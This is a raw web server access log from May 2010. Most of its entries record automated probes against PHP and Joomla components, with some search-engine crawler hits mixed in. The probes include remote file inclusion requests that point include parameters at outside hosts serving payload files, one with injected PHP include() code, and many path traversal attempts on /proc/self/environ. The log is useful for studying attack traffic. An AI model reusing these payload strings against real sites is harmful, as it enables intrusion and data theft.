124.0.74.195 - - [18/May/2010:23:40:12 -0500] "GET /logs/access_log.1273363200%20%20//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 338 "-""Mozilla/5.0"
87.250.255.243 - - [18/May/2010:23:42:14 -0500] "GET /logs/access_log.1253318400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
124.0.74.195 - - [18/May/2010:23:42:39 -0500] "GET /logs/access_log.1265673600//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
124.0.74.195 - - [18/May/2010:23:42:39 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 314 "-""Mozilla/5.0"
124.0.74.195 - - [18/May/2010:23:42:39 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
124.0.74.195 - - [18/May/2010:23:42:39 -0500] "GET /logs/access_log.1266019200//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.licht-planung.at//media/id1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
64.34.173.211 - - [18/May/2010:23:45:23 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.34.173.211 - - [18/May/2010:23:45:23 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
64.34.173.211 - - [18/May/2010:23:45:23 -0500] "GET /logs/access_log.1264636800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
64.34.173.211 - - [18/May/2010:23:46:06 -0500] "GET /logs/access_log.1262563200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
88.191.94.188 - - [18/May/2010:23:48:52 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:48:53 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:48:54 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:48:54 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:05 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:05 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:14 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:14 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:17 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.805"
88.191.94.188 - - [18/May/2010:23:49:17 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.805"
87.250.255.243 - - [18/May/2010:23:51:39 -0500] "GET /logs/access_log.1253404800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
125.248.34.130 - - [18/May/2010:23:52:49 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
125.248.34.130 - - [18/May/2010:23:52:49 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 333 "-""Mozilla/5.0"
125.248.34.130 - - [18/May/2010:23:52:49 -0500] "GET /logs/access_log.1264636800//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
125.248.34.130 - - [18/May/2010:23:53:59 -0500] "GET /logs/access_log.1262563200//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 355 "-""Mozilla/5.0"
81.177.13.130 - - [18/May/2010:23:57:50 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:57:50 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
87.250.255.243 - - [18/May/2010:23:58:42 -0500] "GET /logs/access_log.1171238400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.177.13.130 - - [18/May/2010:23:59:01 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:02 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:07 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:08 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:16 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:16 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:17 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:18 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:19 -0500] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 351 "-""libwww-perl/5.803"
81.177.13.130 - - [18/May/2010:23:59:19 -0500] "GET //administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 346 "-""libwww-perl/5.803"
67.195.112.180 - - [19/May/2010:00:03:54 -0500] "GET /logs/access_log.1217980800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
81.21.79.214 - - [19/May/2010:00:04:22 -0500] "GET /logs/access_log.1273276800/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [19/May/2010:00:04:23 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
81.21.79.214 - - [19/May/2010:00:04:23 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
87.250.255.243 - - [19/May/2010:00:06:56 -0500] "GET /logs/access_log.1256083200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /logs/access_log.1272844800/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /logs/access_log.1272844800/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /logs/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
174.136.55.2 - - [19/May/2010:00:24:04 -0500] "GET /logs/index.php?option=com_joomlaxplorer&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
207.46.199.49 - - [19/May/2010:00:25:36 -0500] "GET /logs/access_log.1226448000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.227.119.49 - - [19/May/2010:00:26:20 -0500] "GET //index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
212.227.119.49 - - [19/May/2010:00:26:20 -0500] "GET /logs//index.php?ROOT_PATH=http://gtrf.interfree.it/id.jpg? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
87.250.255.243 - - [19/May/2010:00:29:21 -0500] "GET /logs/access_log.1235088000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [19/May/2010:00:39:55 -0500] "GET /logs/access_log.1160956800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [19/May/2010:00:39:57 -0500] "GET /logs/access_log.1255737600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [19/May/2010:00:47:18 -0500] "GET /logs/access_log.1258502400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.65.51 - - [19/May/2010:00:47:34 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.65.51 - - [19/May/2010:00:47:35 -0500] "GET /logs/access_log.1271116800 HTTP/1.1" 200 614646 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.190.102.21 - - [19/May/2010:00:48:27 -0500] "GET ///engine/api/api.class.php?dle_config_api=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:00:48:27 -0500] "GET /logs/access_log.1264636800///engine/api/api.class.php?dle_config_api=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 337 "-""Mozilla/5.0"
121.190.102.21 - - [19/May/2010:00:48:28 -0500] "GET /logs///engine/api/api.class.php?dle_config_api=http://dive2world.com/newdive/1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:30 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:30 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:31 -0500] "GET /logs/access_log.1263772800/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:47 -0500] "GET /dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:50 -0500] "GET /logs/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:55:50 -0500] "GET /logs/access_log.1263772800/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:56:16 -0500] "GET /logs/access_log.1265414400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
84.40.30.37 - - [19/May/2010:00:56:33 -0500] "GET /logs/access_log.1265414400/dbmodules/DB_adodb.class.php?PHPOF_INCLUDE_PATH=http://dive2world.com/newdive/1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
178.32.3.34 - - [19/May/2010:00:57:16 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:00:57:16 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:00:57:16 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
89.108.70.32 - - [19/May/2010:00:57:30 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:00:57:39 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:00:57:39 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:00:57:43 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:00:57:43 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:00:57:45 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.69.218.47 - - [19/May/2010:00:57:49 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.73"
206.123.118.132 - - [19/May/2010:00:57:51 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:00:57:52 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:00:57:56 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:00:57:56 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
207.46.13.89 - - [19/May/2010:00:58:06 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.89 - - [19/May/2010:00:58:06 -0500] "GET /logs/access_log.1204156800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
195.135.224.106 - - [19/May/2010:00:58:08 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
89.108.70.32 - - [19/May/2010:00:58:41 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:00:58:41 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
212.69.218.47 - - [19/May/2010:00:58:42 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 363 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.69.218.47 - - [19/May/2010:00:58:42 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 336 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
212.69.218.47 - - [19/May/2010:00:58:50 -0500] "GET /logs/access_log.1272844800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 363 "-""Mozilla/4.8 [en] (Windows NT 5.0; U)"
119.63.198.5 - - [19/May/2010:00:59:23 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.69.218.47 - - [19/May/2010:00:59:28 -0500] "GET /logs/access_log.1273363200/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.73"
212.69.218.47 - - [19/May/2010:00:59:28 -0500] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 336 "-""libwww-perl/5.73"
212.69.218.47 - - [19/May/2010:00:59:29 -0500] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 341 "-""libwww-perl/5.73"
212.69.218.47 - - [19/May/2010:00:59:43 -0500] "GET /logs/access_log.1272844800/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=http://www.jinyoung-tsm.com/rgboard/data/idomila.txt???? HTTP/1.1" 404 363 "-""libwww-perl/5.73"
87.250.255.243 - - [19/May/2010:01:00:46 -0500] "GET /logs/access_log.1185926400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
178.32.3.34 - - [19/May/2010:01:01:09 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:01:01:10 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:01:01:10 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
206.123.118.132 - - [19/May/2010:01:01:39 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:01:39 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
206.123.118.132 - - [19/May/2010:01:01:39 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
74.54.63.138 - - [19/May/2010:01:01:41 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:01:01:41 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:01:01:41 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
89.108.70.32 - - [19/May/2010:01:01:52 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:01:01:53 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
89.108.70.32 - - [19/May/2010:01:01:53 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
178.32.3.34 - - [19/May/2010:01:03:36 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:01:03:36 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
178.32.3.34 - - [19/May/2010:01:03:36 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:01:04:41 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:01:04:41 -0500] "GET /index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
74.54.63.138 - - [19/May/2010:01:04:41 -0500] "GET /logs/index2.php?option=com_myblog&Itemid=66&task=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
195.135.224.106 - - [19/May/2010:01:07:27 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.135.224.106 - - [19/May/2010:01:07:27 -0500] "GET /logs/access_log.1273017600/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
195.135.224.106 - - [19/May/2010:01:07:28 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.135.224.106 - - [19/May/2010:01:07:28 -0500] "GET /index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
195.135.224.106 - - [19/May/2010:01:07:28 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
195.135.224.106 - - [19/May/2010:01:07:28 -0500] "GET /logs/index2.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
